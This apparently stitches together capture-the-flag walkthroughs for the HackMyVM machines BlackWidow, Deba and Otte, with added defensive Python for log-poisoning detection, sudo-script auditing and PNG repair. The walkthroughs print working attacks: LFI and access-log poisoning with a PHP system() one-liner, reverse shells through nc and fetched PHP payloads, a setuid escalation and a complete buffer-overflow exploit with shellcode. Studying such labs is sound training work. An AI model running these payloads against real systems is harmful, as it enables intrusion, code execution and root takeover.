 ===============================================================
 /index.html           (Status: 200) [Size: 42271]
 /assets               (Status: 301) [Size: 325] [--> http://192.168.56.100/company/assets/]
 /forms                (Status: 301) [Size: 324] [--> http://192.168.56.100/company/forms/]
 /changelog.txt        (Status: 200) [Size: 1175]
 /Readme.txt           (Status: 200) [Size: 222]
 /started.php          (Status: 200) [Size: 42271]

Check the source code of /company/index.html.

   <!-- =======================================================
   * Template Name: Arsha - v3.0.3
   * Template URL: https://bootstrapmade.com/arsha-free-bootstrap-html-template-corporate/
   * Author: BootstrapMade.com
   * License: https://bootstrapmade.com/license/
   ========================================================

   We are working to develop a php inclusion method using "file" parameter - Black Widow DevOps Team.

  -->

Fuzz the file parameter of started.php for LFI with wfuzz.

 wfuzz -u 'http://192.168.56.100/company/started.php?file=FUZZ' -w /usr/share/wordlists/seclists/Fuzzing/LFI/LFI-LFISuite-pathtotest.txt --hh 0
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
 =====================================================================
 ID           Response   Lines    Word       Chars       Payload
 =====================================================================
 000000060:   200        29 L     43 W       1582 Ch     "../../../../../../../../../../../../../etc/passwd"
 000000062:   200        29 L     43 W       1582 Ch     "../../../../../../../../../../../../../../../../etc/passwd"
 000000061:   200        29 L     43 W       1582 Ch     "../../../../../../../../../../../../../../etc/passwd"
 000000403:   200        55 L     55 W       727 Ch      "../../../../../../../../../../../../../etc/group"
 000000404:   200        55 L     55 W       727 Ch      "../../../../../../../../../../../../../../etc/group"

We can read /etc/passwd now.

 curl 'http://192.168.56.100/company/started.php?file=../../../../../../../../../../../../../etc/passwd'
 root:x:0:0:root:/root:/bin/bash
 ...
 viper:x:1001:1001:Viper,,,:/home/viper:/bin/bash
 ...

Let's fuzz for log files we can read.

 wfuzz -u "http://192.168.56.100/company/started.php?file=../../../../../../../../../../../../..FUZZ" -w /usr/share/wordlists/logfiles.txt
 ...
 000000031:   200        0 L      0 W        0 Ch        "/var/log/vsftpd.log"
 000000030:   200        0 L      0 W        0 Ch        "/var/log/error.log"
 000000032:   200        0 L      0 W        0 Ch        "/var/log/message"
 000000023:   200        0 L      0 W        0 Ch        "/usr/local/apache/logs/error_log"
 000000025:   200        0 L      0 W        0 Ch        "/var/log/apache/error_log"
 000000026:   200        0 L      0 W        0 Ch        "/var/log/apache2/error_log"
 000000018:   500        0 L      0 W        0 Ch        "/var/log/apache2/access.log"

Note that the response code for /var/log/apache2/access.log is 500 while every other file returns 200. That is because we ran gobuster many times and access.log has grown too big to be returned through curl. We reset the VM to its original state; after that the file can be read through the LFI.

We also notice that the browser's User-Agent string is written to the log file, so it can be replaced with PHP code.

 curl 'http://192.168.56.100/company/started.php?file=../../../../../../../../../../../../../../../../var/log/apache2/access.log'
 192.168.56.150 - - [25/May/2021:04:24:36 -0400] "GET /company/started.php?file=../../../../../../../../../../../../../../../../var/log/apache2/access.log HTTP/1.1" 200 147 "-" "curl/7.74.0"
 192.168.56.150 - - [25/May/2021:04:24:40 -0400] "GET /company/started.php?file=../../../../../../../../../../../../../../../../var/log/apache2/access.log HTTP/1.1" 200 147 "-" "curl/7.74.0"
 192.168.56.150 - - [25/May/2021:04:24:46 -0400] "GET /company/started.php HTTP/1.1" 200 7291 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0"
 192.168.56.150 - - [25/May/2021:04:24:49 -0400] "GET /company/started.php?file=../../../../../../../../../../../../../../../../var/log/apache2/access.log HTTP/1.1" 200 147 "-" "curl/7.74.0"

Set the User-Agent to a PHP one-liner and check that it executes when the log is included.

 curl -A '<?php system($_GET[c]); ?>' http://192.168.56.100
 <html>
 <img src="wallpaper.jpg" alt="wallpaper" width="100%" height="100%">
 </html>

 curl 'http://192.168.56.100/company/started.php?file=../../../../../../../../../../../../../../../../var/log/apache2/access.log&c=id'
 192.168.56.150 - - [25/May/2021:04:25:25 -0400] "GET / HTTP/1.1" 200 334 "-" "uid=33(www-data) gid=33(www-data) groups=33(www-data)
 "
 192.168.56.150 - - [25/May/2021:04:25:29 -0400] "GET /company/started.php?file=../../../../../../../../../../../../../../../../var/log/apache2/access.log HTTP/1.1" 200 251 "-" "curl/7.74.0"
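
Both Broken and BlackWidow use the same two-step log poisoning: a PHP tag is planted in the User-Agent so the web server writes it into access.log, and the log is then pulled in through the LFI parameter. As an added example (not code from the walkthroughs), the Python below scans combined-format access log lines for both steps and correlates them per source IP; the sample log lines are constructed to mirror the excerpts above.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qs, unquote, urlsplit

# Apache/nginx "combined" log format, the layout of the access.log excerpts above.
COMBINED_LOG = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)(?: (?P<proto>[^"]*))?" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)
PHP_TAG = re.compile(r'<\?(?:php\b|=)', re.IGNORECASE)  # "<?php" or "<?="
TRAVERSAL = re.compile(r'\.\.[/\\]')                     # "../" or "..\" after decoding
LOG_FILE_HINTS = ('/var/log/', 'access.log', 'access_log', 'error.log', 'error_log', 'auth.log')


def parse_line(line):
    """Return the fields of one combined-format line, or None if it does not match."""
    m = COMBINED_LOG.match(line.rstrip('\n'))
    return m.groupdict() if m else None


def classify(entry):
    """Return the indicator names one parsed entry triggers (empty list if none)."""
    hits = []
    # A PHP open tag in a logged header is the poisoning write itself.
    if PHP_TAG.search(entry['agent']) or PHP_TAG.search(entry['referer']):
        hits.append('php_tag_in_header')
    # Decode twice so double-encoded traversal (%252e%252e%252f) is caught as well;
    # decoding before splitting the query is fine for detection, not for parsing.
    decoded = unquote(unquote(entry['path']))
    params = parse_qs(urlsplit(decoded).query, keep_blank_values=True)
    for name, values in params.items():
        for value in values:
            if TRAVERSAL.search(value):
                hits.append(f'traversal_in_param:{name}')
                if any(hint in value for hint in LOG_FILE_HINTS):
                    hits.append(f'log_file_inclusion:{name}')
    return hits


def analyze(lines):
    """Parse all lines, collect per-line indicators and correlate them per source IP.

    Returns (findings, chains): findings holds one dict per suspicious or unparsable
    line; chains is the sorted list of source IPs that both planted a PHP tag in a
    header and included a log file through a traversal parameter, i.e. the complete
    poisoning sequence used against Broken and BlackWidow.
    """
    findings = []
    per_ip = defaultdict(set)
    for lineno, line in enumerate(lines, 1):
        entry = parse_line(line)
        if entry is None:
            findings.append({'line': lineno, 'ip': None, 'indicators': ['unparsed']})
            continue
        hits = classify(entry)
        if hits:
            findings.append({'line': lineno, 'ip': entry['ip'], 'indicators': hits})
            per_ip[entry['ip']].update(h.split(':')[0] for h in hits)
    chains = sorted(ip for ip, kinds in per_ip.items()
                    if {'php_tag_in_header', 'log_file_inclusion'} <= kinds)
    return findings, chains


# Constructed sample (not a capture from the machines above), combined log format.
SAMPLE_LOG = [
    '10.0.0.5 - - [25/May/2021:04:24:46 -0400] "GET /company/started.php HTTP/1.1" 200 7291 "-" '
    '"Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0"',
    # step 1: the poisoning request, PHP tag in the User-Agent
    '10.0.0.9 - - [25/May/2021:04:25:25 -0400] "GET / HTTP/1.1" 200 334 "-" "<?php system($_GET[c]); ?>"',
    # step 2: the poisoned log pulled in through the file= parameter
    '10.0.0.9 - - [25/May/2021:04:25:29 -0400] "GET /company/started.php?file=../../../../../../var/log/apache2/access.log&c=id HTTP/1.1" 200 251 "-" "curl/7.74.0"',
    # a plain traversal probe from another source, URL-encoded
    '10.0.0.7 - - [25/May/2021:04:26:01 -0400] "GET /file.php?file=..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 1451 "-" "curl/7.74.0"',
]

if __name__ == '__main__':
    found, poisoning_chains = analyze(SAMPLE_LOG)
    for f in found:
        print(f"line {f['line']:>3}  {f['ip'] or '-':<10}  {', '.join(f['indicators'])}")
    print('log poisoning chain from:', ', '.join(poisoning_chains) or 'none')
```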

To get a reverse shell I tried many ways; in the end the following method worked. Run a temporary HTTP server locally, with a PHP reverse shell named "r" in its root folder.

 sudo php -S 0.0.0.0:80
 [Tue May 25 19:53:10 2021] PHP 7.4.15 Development Server (http://0.0.0.0:80) started
 [Tue May 25 19:54:43 2021] 192.168.56.100:39630 Accepted
 [Tue May 25 19:54:43 2021] 192.168.56.100:39630 [200]: (null) /r
 [Tue May 25 19:54:43 2021] 192.168.56.100:39630 Closing

On the VM, use curl (through the poisoned log) to fetch the reverse shell "r" and save it as "r.php".

 curl 'http://192.168.56.100/company/started.php?file=../../../../../../../../../../../../../../../../var/log/apache2/access.log&c=curl%20http://192.168.56.150/r%20-o%20r.php'

Visit the PHP shell.

 curl http://192.168.56.100/company/r.php

Then we get a reverse shell.

 nc -nlvp 1234
 Ncat: Version 7.91 ( https://nmap.org/ncat )
 Ncat: Listening on :::1234
 Ncat: Listening on 0.0.0.0:1234
 Ncat: Connection from 192.168.56.100.
 Ncat: Connection from 192.168.56.100:48366.
 Linux blackwidow 4.19.0-13-amd64 #1 SMP Debian 4.19.160-2 (2020-11-28) x86_64 GNU/Linux
  05:01:50 up 37 min,  0 users,  load average: 0.00, 0.00, 0.00
 USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
 uid=33(www-data) gid=33(www-data) groups=33(www-data)
 /bin/sh: 0: can't access tty; job control turned off
 $ id
 uid=33(www-data) gid=33(www-data) groups=33(www-data)

Found a strange string in /var/backups/auth.log, which is viper's password. (I think this step is the hardest.)

 Dec 12 16:56:34 test sshd[29558]: PAM 2 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=192.168.1.109  user=viper
 Dec 12 16:56:43 test sshd[29560]: Invalid user ?V1p3r2020!? from 192.168.1.109 port 7090
 Dec 12 16:56:44 test sshd[29560]: pam_unix(sshd:auth): check pass; user unknown

Check viper's bash history.

 viper@blackwidow:~$ cat .bash_history
 ...
 arsenic -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'
 ls                                                  
 ./arsenic -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'
 su root      

Search for the file named arsenic.

 viper@blackwidow:~$ find / -name arsenic 2>/dev/null
 /home/viper/backup_site/assets/vendor/weapon/arsenic

Su to root.

 viper@blackwidow:~$ /home/viper/backup_site/assets/vendor/weapon/arsenic -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'
 # id                                                
 uid=0(root) gid=1001(viper) groups=1001(viper)

HackMyVm Deba Walkthrough

https://hackmyvm.eu/machines/machine.php?vm=Deba

Scan ports; 22, 80 and 3000 are open.

 # Nmap 7.91 scan initiated Fri May 14 08:30:51 2021 as: nmap -sV -sC -p- -oN ports.log 192.168.56.100
 Nmap scan report for 192.168.56.100 (192.168.56.100)
 Host is up (0.0012s latency).
 Not shown: 65532 closed ports
 PORT     STATE SERVICE VERSION
 22/tcp   open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
 | ssh-hostkey:
 |   2048 22:e4:1e:f3:f6:82:7b:26:da:13:2f:01:f9:d5:0d:5b (RSA)
 |   256 7b:09:3e:d4:a7:2d:92:01:9d:7d:7f:32:c1:fd:93:5b (ECDSA)
 |_  256 56:fd:3d:c2:19:fe:22:24:ca:2c:f8:07:90:1d:76:87 (ED25519)
 80/tcp   open  http    Apache httpd 2.4.38 ((Debian))
 |_http-server-header: Apache/2.4.38 (Debian)
 |_http-title: Apache2 Debian Default Page: It works
 3000/tcp open  http    Node.js Express framework
 |_http-title: Site doesn't have a title (text/html; charset=utf-8).

Scanning port 80 found nothing. Check port 3000; it looks like a Node.js site.

[image-20210524174309208.png]

Use the classic Node.js 'node-serialize' Remote Code Execution PoC at: https://www.exploit-db.com/exploits/49552.

Get a reverse shell as www-data. Check sudo.

 www-data@debian:/home/low$ sudo -l
 sudo -l
 Matching Defaults entries for www-data on debian:
     env_reset, mail_badpass,
     secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

 User www-data may run the following commands on debian:
     (ALL : low) NOPASSWD: /usr/bin/python3 /home/low/scripts/script.py

Check the files and contents of /home/low/scripts; we have write permission on main.py.

 www-data@debian:/home/low/scripts$ ls -la
 ls -la
 total 16
 drwxr-xr-x 2 low      low      4096 may  7 17:59 .
 drwxr-xr-x 8 low      low      4096 may  7 23:45 ..
 -rwxr-xr-x 1 www-data www-data   88 may  7 10:57 main.py
 -rw-r--r-- 1 low      low        80 may  7 10:44 script.py

 www-data@debian:/home/low/scripts$ cat script.py
 cat script.py
 import main
 import os
 print("\n")
 os.system("ip a | grep enp0s3")
 print("\n")

 www-data@debian:/home/low/scripts$ cat main.py
 cat main.py
 from os import system as main
 print("\n")
 print("Just main")
 main("whoami")
 print("\n")

Modify main.py to get a shell as user low.

 echo 'import os;os.system("/bin/bash");' > main.py
 sudo -u low python3 /home/low/scripts/script.py
 low@debian:~/scripts$ id
 id
 uid=1001(low) gid=1001(low) grupos=1001(low)
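
The sudo rule is only as strong as every file the script pulls in. The following Python audit is an added example, not from the original post or the machine: it parses a sudo-allowed script, resolves the modules it imports from its own directory, and flags any file or the directory itself that a uid outside the trusted set owns or can write to. The demo layout is constructed in a temp directory, mirroring script.py and main.py above.

```python
import ast
import os
import stat
import tempfile


def local_imports(script_path):
    """Paths of modules the script imports that resolve to .py files in its own directory."""
    with open(script_path, 'r', encoding='utf-8') as fh:
        tree = ast.parse(fh.read(), filename=script_path)
    script_dir = os.path.dirname(os.path.abspath(script_path))
    found = []
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            names = [alias.name.split('.')[0] for alias in node.names]
        elif isinstance(node, ast.ImportFrom) and node.module and node.level == 0:
            names = [node.module.split('.')[0]]
        else:
            continue
        for name in names:
            candidate = os.path.join(script_dir, name + '.py')
            if os.path.isfile(candidate) and candidate not in found:
                found.append(candidate)
    return found


def writable_by_untrusted(path, trusted_uids):
    """True if the path is owned by a uid outside trusted_uids, or is group/world writable."""
    st = os.stat(path)
    if st.st_uid not in trusted_uids:
        return True
    return bool(st.st_mode & (stat.S_IWGRP | stat.S_IWOTH))


def audit_sudo_script(script_path, trusted_uids):
    """Return (path, reason) pairs for the script, its local imports, and its directory.

    The script's directory is first on sys.path when python3 runs it, so a writable
    directory also lets a caller drop a module that shadows a stdlib import.
    """
    problems = []
    for path in [script_path] + local_imports(script_path):
        if writable_by_untrusted(path, trusted_uids):
            problems.append((path, 'owned by or writable by an untrusted user'))
    script_dir = os.path.dirname(os.path.abspath(script_path))
    if writable_by_untrusted(script_dir, trusted_uids):
        problems.append((script_dir, 'script directory writable by an untrusted user'))
    return problems


def build_demo():
    """Constructed copy of the layout above: script.py imports main.py, and main.py is writable.

    chown is not available to an unprivileged process, so a world-writable main.py stands
    in for the main.py owned by www-data on the machine.
    """
    d = tempfile.mkdtemp()
    script_py = os.path.join(d, 'script.py')
    main_py = os.path.join(d, 'main.py')
    with open(script_py, 'w') as fh:
        fh.write('import main\nimport os\nos.system("ip a | grep enp0s3")\n')
    with open(main_py, 'w') as fh:
        fh.write('from os import system as main\nmain("whoami")\n')
    os.chmod(script_py, 0o644)
    os.chmod(main_py, 0o666)
    return script_py


def demo_problems():
    """Run the audit on the constructed layout, trusting root and the current user."""
    return audit_sudo_script(build_demo(), trusted_uids=(0, os.getuid()))


if __name__ == '__main__':
    for path, reason in demo_problems():
        print(f'{path}: {reason}')
```

For a real rule the trusted set is root plus the user sudo runs the script as (here low), and the fix is to make every file on the list owned by one of them with mode 0644 or tighter.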

Upload id_rsa.pub to get ssh access as user low.

 wget http://192.168.56.150/id_rsa.pub -O authorized_keys
 chmod 600 authorized_keys

After logging in as low, run pspy64. The user debian (uid 1000) runs /home/debian/Documentos/backup/dissapeared.py every minute.

 2021/05/14 05:31:02 CMD: UID=0    PID=2240   | /usr/sbin/CRON -f
 2021/05/14 05:31:02 CMD: UID=1000 PID=2241   | /usr/bin/python3 /home/debian/Documentos/backup/dissapeared.py

Create the file and write shell code in it.

 low@debian:/home/debian/Documentos/backup$ echo 'import os;os.system("nc 192.168.56.150 2234 -e /bin/bash");' > dissapeared.py

Get a reverse shell as user debian.

 nc -nlvp 2234      
 Ncat: Version 7.91 ( https://nmap.org/ncat )
 Ncat: Listening on :::2234
 Ncat: Listening on 0.0.0.0:2234
 Ncat: Connection from 192.168.56.100.
 Ncat: Connection from 192.168.56.100:45812.
 id
 uid=1000(debian) gid=1000(debian) grupos=1000(debian),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),114(lpadmin),115(scanner)

Spawn an interactive shell.

 python3 -c 'import pty;pty.spawn("/bin/bash")'

Here, we can upload id_rsa.pub again to get ssh login.

Check sudo again.

 debian@debian:~$ sudo -l
 Matching Defaults entries for debian on debian:
     env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

 User debian may run the following commands on debian:
     (ALL : root) NOPASSWD: /bin/wine /opt/Buffer-Overflow-Vulnerable-app/brainfuck.exe

Run brainfuck.exe; it opens port 9999 and reads user input.

[image-20210524180541022.png]

Disassemble brainfuck.exe; the vulnerability is in the get_reply function.

 int __cdecl get_reply(char *Source)
 {
   size_t v1; // eax
   char Destination[520]; // [esp+10h] [ebp-208h] BYREF

   printf("[get_reply] s = [%s]\n", Source);
   strcpy(Destination, Source);
   v1 = strlen(Destination);
   printf("[get_reply] copied %d bytes to buffer\n", v1);
   return strcmp(Destination, "shitstorm\n");
 }

The buffer holds 520 bytes of user input; after it come 4 bytes for the saved ebp and 4 bytes for the return address. We can generate a test string.

 python3 -c "print('a'*520+'bbbb'+'cccc')"
 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbbcccc

Test it on Windows and debug it with OllyDbg: the return address is overwritten exactly by 'cccc'.

[image-20210524172438560.png]

brainfuck.exe also contains a jmp esp instruction.

 ropper --file brainfuck.exe --search 'jmp esp'
 [INFO] Load gadgets for section: .text
 [LOAD] loading... 100%
 [LOAD] removing double gadgets... 100%
 [INFO] Searching for gadgets: jmp esp

 [INFO] File: brainfuck.exe
 0x311712f3: jmp esp;

Then we can write the exploit with the classic shellcode.

 #!/usr/bin/python3
 import socket

 target_ip = '192.168.56.100'
 target_port = 9999
 recv_buf = 4096

 # 520 bytes fill the buffer, 4 more overwrite the saved ebp
 junk = b'a' * 520 + b'bbbb'
 # return address: the jmp esp gadget at 0x311712f3, little-endian
 ret_addr = b'\xf3\x12\x17\x31'
 # the classic shellcode
 shell_code = b'\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\x6a\x0b\x58\xcd\x80'
 payload = junk + ret_addr + shell_code

 with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as clientSock:
     clientSock.connect((target_ip, target_port))
     data_from_srv = clientSock.recv(recv_buf)
     print(f"Reply --> {data_from_srv}")
     print(f"Sending --> {payload}")
     clientSock.sendall(payload)

Start brainfuck.exe with sudo, run exp.py on the local machine, and we get a root shell.

HackMyVm Otte Walkthrough

https://hackmyvm.eu/machines/machine.php?vm=Otte

Scan ports first.

 nmap -sV -sC -p- -oN ports.log 192.168.56.100
 Nmap scan report for 192.168.56.100 (192.168.56.100)
 Host is up (0.00099s latency).
 Not shown: 65532 closed ports
 PORT   STATE SERVICE VERSION
 21/tcp open  ftp     ProFTPD
 | ftp-anon: Anonymous FTP login allowed (FTP code 230)
 |_-rw-r--r--   1 ftp      ftp            89 May 15 12:25 note.txt
 22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
 | ssh-hostkey:
 |   2048 e8:38:58:1b:75:c5:53:47:32:10:d4:12:79:69:c8:ad (RSA)
 |   256 35:92:34:4e:cd:65:c6:08:20:76:35:ba:d9:09:64:65 (ECDSA)
 |_  256 a2:87:9f:60:a4:0d:c5:43:6a:4f:02:79:56:ff:6e:d9 (ED25519)
 80/tcp open  http    Apache httpd 2.4.38
 | http-auth:
 | HTTP/1.1 401 Unauthorized\x0D
 |_  Basic realm=Siemens - Root authentification
 |_http-server-header: Apache/2.4.38 (Debian)
 |_http-title: 401 Unauthorized
 Service Info: Host: 127.0.1.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Log in to FTP anonymously and get note.txt.

 cat note.txt
 Hi thomas ! I put on you personal folder the php code you asked me !

 See you later +++

Visiting port 80 requires authentication.

[image-20210523214949625.png]

Following the hint, search for default credentials of Siemens routers. (This step was hard for me because I have never used a Siemens router.)

https://www.192-168-1-1-ip.co/router/siemens/siemens/17622/

After some failures, we get the correct credentials.

root zP2wxY4uE

Then we can scan for folders and files.

 gobuster dir -u http://192.168.56.100 -t 50  -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt  -x .html,.php,.txt,.bak,.zip -b 401,403,404,500 --wildcard   -o 80.log -U root -P zP2wxY4uE

 /index.php            (Status: 200) [Size: 28]
 /image                (Status: 200) [Size: 47076]
 /config.php           (Status: 200) [Size: 0]
 /thinkgeek.php        (Status: 200) [Size: 28]

Fuzz thinkgeek.php.

 wfuzz -u 'http://192.168.56.100/thinkgeek.php?FUZZ=id' -w /usr/share/seclists/Discovery/Web-Content/big.txt --basic root:zP2wxY4uE --hh 28

 000007535:   200        0 L      0 W        0 Ch        "file"  

Try LFI.

 curl -u  root:zP2wxY4uE 'http://192.168.56.100/thinkgeek.php?file=../../../../etc/passwd'

 root:x:0:0:root:/root:/bin/bash
 ...
 thomas:x:1000:1000:thomas,,,:/home/thomas:/bin/bash
 ...
 laetitia:x:1001:1001:,,,:/home/laetitia:/bin/bash
 cedric:x:1002:1002:,,,:/home/cedric:/bin/bash

Following the hint in note.txt, fuzz for /home/thomas/*.php.

 wfuzz -u 'http://192.168.56.100/thinkgeek.php?file=../../../../home/thomas/FUZZ.php' -w /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt  --basic root:zP2wxY4uE --hh 0

 =====================================================================
 ID           Response   Lines    Word       Chars       Payload      
 =====================================================================

 000016344:   200        2 L      3 W        20 Ch       "shell"  

Fuzz the parameter of shell.php.

 wfuzz -u 'http://192.168.56.100/thinkgeek.php?file=../../../../home/thomas/shell.php&FUZZ=id' -w /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt  --basic root:zP2wxY4uE --hh 20

 =====================================================================
 ID           Response   Lines    Word       Chars       Payload  
 =====================================================================

 000004959:   200        3 L      6 W        74 Ch       "command"

Visit shell.php and run the reverse shell command.

http://192.168.56.100/thinkgeek.php?file=../../../../home/thomas/shell.php&command=nc%20192.168.56.150%201234%20-e%20/bin/bash

In another terminal, listen on port 1234 and get the reverse shell.

 nc -nlvp 1234
 Ncat: Version 7.91 ( https://nmap.org/ncat )
 Ncat: Listening on :::1234
 Ncat: Listening on 0.0.0.0:1234
 Ncat: Connection from 192.168.56.100.
 Ncat: Connection from 192.168.56.100:59386.
 id
 uid=33(www-data) gid=33(www-data) groups=33(www-data)

Upgrade to interactive shell.

 python3 -c 'import pty;pty.spawn("/bin/bash")'
 www-data@otte:/var/www/html$

In /home/thomas, read nightmare.txt.

 www-data@otte:/home/thomas$ ls -la
 ls -la
 total 100
 drwxr-xr-x 4 thomas thomas  4096 May 20 09:46 .
 drwxr-xr-x 5 root   root    4096 May 16 12:34 ..
 -rw------- 1 thomas thomas    50 May 20 09:46 .Xauthority
 lrwxrwxrwx 1 thomas thomas     9 May 16 13:25 .bash_history -> /dev/null
 -rw-r--r-- 1 thomas thomas   220 May 15 12:12 .bash_logout
 -rw-r--r-- 1 thomas thomas  3526 May 17 14:42 .bashrc
 drwxr-xr-x 3 thomas thomas  4096 May 15 14:00 .local
 -rw-r--r-- 1 thomas thomas   807 May 15 12:12 .profile
 drwx------ 2 thomas thomas  4096 May 17 09:35 .ssh
 -rw-r--r-- 1 thomas thomas 61258 May 15 14:44 important_file
 -rw-r--r-- 1 thomas thomas   122 May 15 14:56 nightmare.txt
 -rwxr-xr-x 1 thomas thomas    93 May 17 09:15 shell.php
 www-data@otte:/home/thomas$ cat nightmare.txt
 cat nightmare.txt
 who is the son of a bitch who replaced the signature on my file with fucking XXX?! I need to find the original signature!
 www-data@otte:/home/thomas$

Download important_file to the local machine and check its content; the header is corrupted.

 less important_file
 important_file  (press RETURN)
 00000000: XXXXXXXXXXXXXXXX 0000 000d 4948 4452  .XXX........IHDR
 00000010: 0000 012c 0000 012c 0806 0000 0079 7d8e  ...,...,.....y}.
 00000020: 7500 0000 1b74 4558 7443 7265 6174 696f  u....tEXtCreatio
 00000030: 6e20 5469 6d65 0031 3632 3130 3037 3337  n Time.162100737
 00000040: 3935 3239 15fc b9e2 0000 37e9 4944 4154  9529......7.IDAT
 00000050: 78da ed9d 8bab 7ecf 55de f38f 168a 2085  x.....~.U..... .
 00000060: 2214 410a 2208 2294 8214 4428 8582 286a  ".A."."...D(..(j
 00000070: bd50 898a d6b6 62b0 28a2 a849 9a18 a3b9  .P....b.(..I....

...

Searching for IHDR on Google shows it is a PNG file. Replace the XXXX bytes with a normal PNG file header.

 head important_file  
 00000000: 8950 4e47 0d0a 1a0a 0000 000d 4948 4452  .XXX........IHDR
 00000010: 0000 012c 0000 012c 0806 0000 0079 7d8e  ...,...,.....y}.
 00000020: 7500 0000 1b74 4558 7443 7265 6174 696f  u....tEXtCreatio
 00000030: 6e20 5469 6d65 0031 3632 3130 3037 3337  n Time.162100737
 00000040: 3935 3239 15fc b9e2 0000 37e9 4944 4154  9529......7.IDAT
 00000050: 78da ed9d 8bab 7ecf 55de f38f 168a 2085  x.....~.U..... .
 00000060: 2214 410a 2208 2294 8214 4428 8582 286a  ".A."."...D(..(j
 00000070: bd50 898a d6b6 62b0 28a2 a849 9a18 a3b9  .P....b.(..I....
 00000080: 7889 a931 3626 8d9a 8ba6 8947 3e5f ddb8  x..16&.....G>_..
 00000090: ddee 99f5 ccac 35b3 67ef 773d 3090 7c7f  ......5.g.w=0.|.
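
Doing the repair in a script rather than by hand lets you verify the result: the IHDR chunk that always follows the 8-byte signature carries its own CRC, so after restoring the signature you can check that nothing beyond those 8 bytes was damaged. This Python is an added example, not part of the original post; the sample file is constructed inline (a 1x1 PNG with its first eight bytes overwritten, mirroring important_file).

```python
import struct
import zlib

PNG_SIGNATURE = b'\x89PNG\r\n\x1a\n'
IHDR_PREFIX = b'\x00\x00\x00\r' + b'IHDR'   # chunk length 13 followed by the chunk type


def make_chunk(ctype, payload):
    """Length, type, payload, and CRC32 over type+payload, as the PNG format lays it out."""
    crc = zlib.crc32(ctype + payload) & 0xffffffff
    return struct.pack('>I', len(payload)) + ctype + payload + struct.pack('>I', crc)


def read_chunks(data):
    """Yield (type, payload, crc_ok) for each chunk after the 8-byte signature."""
    pos = 8
    while pos + 8 <= len(data):
        length, ctype = struct.unpack('>I4s', data[pos:pos + 8])
        payload = data[pos + 8:pos + 8 + length]
        stored = data[pos + 8 + length:pos + 12 + length]
        expected = struct.pack('>I', zlib.crc32(ctype + payload) & 0xffffffff)
        yield ctype, payload, stored == expected
        pos += 12 + length
        if ctype == b'IEND':
            break


def repair_signature(data):
    """Restore the PNG signature when only the first 8 bytes were overwritten."""
    if data[:8] == PNG_SIGNATURE:
        return data
    # Every PNG starts with a 13-byte IHDR chunk right after the signature,
    # so the chunk header at offset 8 is the anchor we can trust.
    if data[8:16] != IHDR_PREFIX:
        raise ValueError('no IHDR at offset 8: not a PNG with only the signature damaged')
    fixed = PNG_SIGNATURE + data[8:]
    _, _, crc_ok = next(read_chunks(fixed))
    if not crc_ok:
        raise ValueError('IHDR CRC mismatch: damage extends past the signature')
    return fixed


def is_repairable(data):
    try:
        repair_signature(data)
        return True
    except ValueError:
        return False


def ihdr_info(data):
    """Width, height, bit depth and colour type from the IHDR payload."""
    width, height, depth, colour = struct.unpack('>IIBB', data[16:26])
    return {'width': width, 'height': height, 'bit_depth': depth, 'color_type': colour}


def build_damaged_sample():
    """Constructed 1x1 RGBA PNG whose first eight bytes are replaced by 'X', like important_file."""
    ihdr = struct.pack('>IIBBBBB', 1, 1, 8, 6, 0, 0, 0)
    raw = b'\x00' + b'\x00\x00\x00\xff'          # filter byte 0 + one opaque black pixel
    png = (PNG_SIGNATURE + make_chunk(b'IHDR', ihdr)
           + make_chunk(b'IDAT', zlib.compress(raw)) + make_chunk(b'IEND', b''))
    return b'X' * 8 + png[8:]


if __name__ == '__main__':
    fixed = repair_signature(build_damaged_sample())
    print(ihdr_info(fixed), [c for c, _, _ in read_chunks(fixed)])
```

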